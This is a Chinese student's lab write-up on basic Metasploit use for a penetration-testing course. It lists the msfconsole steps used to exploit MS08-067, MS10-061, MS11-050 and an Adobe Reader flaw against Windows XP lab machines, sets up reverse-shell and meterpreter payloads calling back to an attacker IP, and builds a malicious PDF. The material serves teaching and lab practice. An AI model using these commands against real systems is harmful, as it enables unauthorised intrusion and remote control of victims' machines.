20145320 《网络渗透》MSF基础应用

20145320 《网络渗透》MSF基础应用

1.实验后回答问题

  • exploit
    • 攻击模块,利用发现的安全漏洞或配置弱点对远程目标系统进行攻击。主要分为主动攻击和被动攻击。像我们这次做的实验中,第一个是主动攻击,第二三个均属于被动攻击。
  • payload
    • 攻击载荷模块,这个模块实质是一段shellcode。在渗透成功之后,将程序流程劫持并跳转入这段机器代码中执行
  • encode
    • 编码器模块,首先是确保不会出现“坏字符”(如0x00字符串尾部,会截断后面的内容)。其次是“免杀”,防止受到杀毒软件的阻断!

2.实验总结与体会

这几个实验我发现就是在使用exploit攻击模块中不同的攻击方法进行攻击,而且流程基本都一样。先使用search exploit/windows/smb/ms找到windows中的漏洞,然后看看其简单的描述,选中其中一个使用info xxx查看其信息,主要看其可攻击targets、描述、必须设置的参数。接下来设置payload,同时设置payload的参数,所有的参数都设置完毕之后就可以进行exploit攻击了!总的来说就是在使用metaspolit这个软件提供的攻击服务!!

在完成老师安排的任务之外,我还尝试了:

ms06_066_nwapi 

885438-20170414175456751-256798476.png
只差一步可恶!

下面这个是成功的!!!

MS10_061远程漏洞攻击(主动攻击)

use exploit/windows/smb/ms10_061_spoolss进入攻击模块

info查看
885438-20170415162444048-1331324348.png
等级Excellent,发布时间2010-09-14

885438-20170415162501564-1475004655.png

目标机器:所有的windows平台

885438-20170415162515892-1903945045.png
需要设置参数:目标地址和端口,可选:目标共享打印机名
885438-20170415162532626-229281936.png
描述:打印机漏洞

被进攻的机器为Windows xp中文版
其中xp中要有共享打印机,具体做法

1、在控制面板中的---打印机和传真---下有默认的Microsoft打印机,但好像并不好用(可以尝试下直接改属性---端口为COM1试试)。

2、VMware提供虚拟打印机,在com1口。

3、删掉了默认的打印机(自愿),然后,添加打印机---连接到次计算机的本地打印机(去掉勾选的自动检测)---COM1口(VMware中查看即可)---打印机厂商默认即可---打印机名---共享---位置随意可不填

4、重启print Spooler服务(不重启可能导致meta连接打印机失败)

回到Linux中,设置相关参数后(要注意:set PNAME 为目标打印机name),exploit攻击成功!
885438-20170415163502236-205440886.png

要攻击一个有漏洞的主机简直不过太简单了!!!我感觉修复一个漏洞所需要的时间还没有使用这个漏洞拿来攻击所花费的时间长!!以后有补丁真的马上安装,我再也不敢拖了。真的害怕!

3.实践过程记录

MS08_067远程漏洞攻击实践

输入命令use exploit/windows/smb/ms08_067_netapi,info了解该漏洞模块的使用。

885438-20170413215522205-419091647.png
windows平台,等级great,补丁发布时间2008-10-28

885438-20170413215546486-1090017589.png
可攻击的目标:windows 2003

885438-20170413215636830-32825493.png
需要设置的参数目标地址(RHOST)、目标端口(RPORT)、使用管道(SMBPIPE)

885438-20170413215710517-1032550374.png
描述如上

输入命令show payloads会显示出有效的攻击载荷,如下图所示,我们找到一个shell_reverse_tcp。

885438-20170414155711064-97651018.png

使用命令set payload generic/shell_reverse_tcp设置攻击有效载荷。

根据show options中必须设置的东西进行设置

HvnD5lA.png

输入命令exploit开始攻击,轻而易举的正常攻击成功

885438-20170414160809408-1709525012.png

中途我对老师给的中文版的windows xp进行攻击,以为成功了,没想到看了同学的博客发现是白开心一场
885438-20170414160713548-1065824199.png

MS11-050漏洞攻击

同上述步骤,第一步,查找相关漏洞信息
885438-20170413204453751-1627667011.png
平台winodows,等级Normal,补丁发布时间2011-06-16
885438-20170413204539533-2055211776.png
可攻击的目标:XP或Vista的IE7和IE8
885438-20170413204558923-1594554841.png
必须的参数:反弹地址(SRVHOST)、反弹端口(SRVPORT)
885438-20170413204624501-138479881.png
描述

使用show payloads指令查看可以使用的负载
JTRKH38.png

加载payload

    set payload windows/meterpreter/reverese_http

设置相应参数,通过show options查看

set URIPATH ms5320  //设置访问主页的URI
set LHOST 192.168.47.130    //设置攻击IP
set LPORT 8888  //设置攻击端口

打开服务exploit,发起渗透攻击
tLwsaQ2.png

此时,在靶机中启动IE 7浏览器,访问链接:http://192.168.47.130:8080/ms5320

15HSJWZ.png

与此同时,在攻击机的MSF终端中,可以看到如下信息:
U9mEadG.png

输入sessions可以看见正在监听端的活动会话

NTh2GH1.png
发现1端口正在监听,使用session -i 1接入ID号为1的当前靶机回连的会话

rLLJwfe.png
攻击成功!

Adobe渗透测试过程

这个渗透攻击模块的路径为windows/fileformat/adobe_cooltype_sing,使用info查看该模块的内容
885438-20170412193618783-613312933.png

885438-20170412193653923-2075990205.png

可以看到这个漏洞是存在于8.2.4和9.3.4版本的Adobe Reader中,于2010-09-07发布的补丁,等级是Great。

我们进入该模块设定相关系数并生成相关文件5320.pdf
TeStuyn.png

885438-20170412092219969-1405214011.png

885438-20170412092236141-2133347244.png

将生成的pdf文件导入到windows XP Attacker靶机中运行,回连成功!
885438-20170412092300126-1374454253.png

这个这个pdf的内容,内容并不可疑!
885438-20170412092409876-2118267197.png

辅助模块

先手动创建一个msf所需的数据库

输入命令 use auxiliary/scanner/discovery/arp_sweep进入模块

show options查看需要设置的消息,其中rhosts填写自己电脑所在网段

设置必要参数

set RHOSTS 172.30.1.0/21

set threads 2

命令run开启扫描,结果可以看到除了自己主机的IP,还有其他ip

885438-20170414162545564-1277722885.png

转载于:https://www.cnblogs.com/zqh20145320/p/6714618.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值